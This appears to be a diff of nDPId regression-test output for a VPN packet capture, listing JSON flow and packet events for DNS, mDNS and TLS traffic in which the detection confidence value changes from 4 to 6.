{"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABT7b0AAP8RLGMKAADjS0tLS\/CtADUAP6A2wl8BAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569687260767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687260767,"pkt":"NDY7z3UoLH6BsEqhCABFAABXAABAADoRnx1LS0tLCgAA4wA1\/cwAQw7hJ8aBgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569687260772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569687260772,"pkt":"NDY7z3UoLH6BsEqhCABFAABTAABAADoRnyFLS0tLCgAA4wA18K0APx+zwl+BgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569687261034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261034,"pkt":"LH6BsEqhNDY7z3UoCABFAABPSYUAAP8R0J8KAADjS0tLS9+tADUAOxFSxpgBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQAB"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1569687261035,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261035,"pkt":"LH6BsEqhNDY7z3UoCABFAABPv9YAAP8RWk4KAADjS0tLS86PADUAO9rj8yQBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAAB"} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569687261050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1569687261050,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1360AjBq8xpiBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQABwCMABgABAAACzwBFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1569687261054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1569687261054,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1zo8AjF9N8ySBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAABwCMABgABAAADVABFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} -00703{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} +00703{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1569687261485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1569687261485,"pkt":"LH6BsEqhNDY7z3UoCABFAABPCDAAAP8REfUKAADjS0tLS+dWADUAO8LFIuMBAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQAB"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 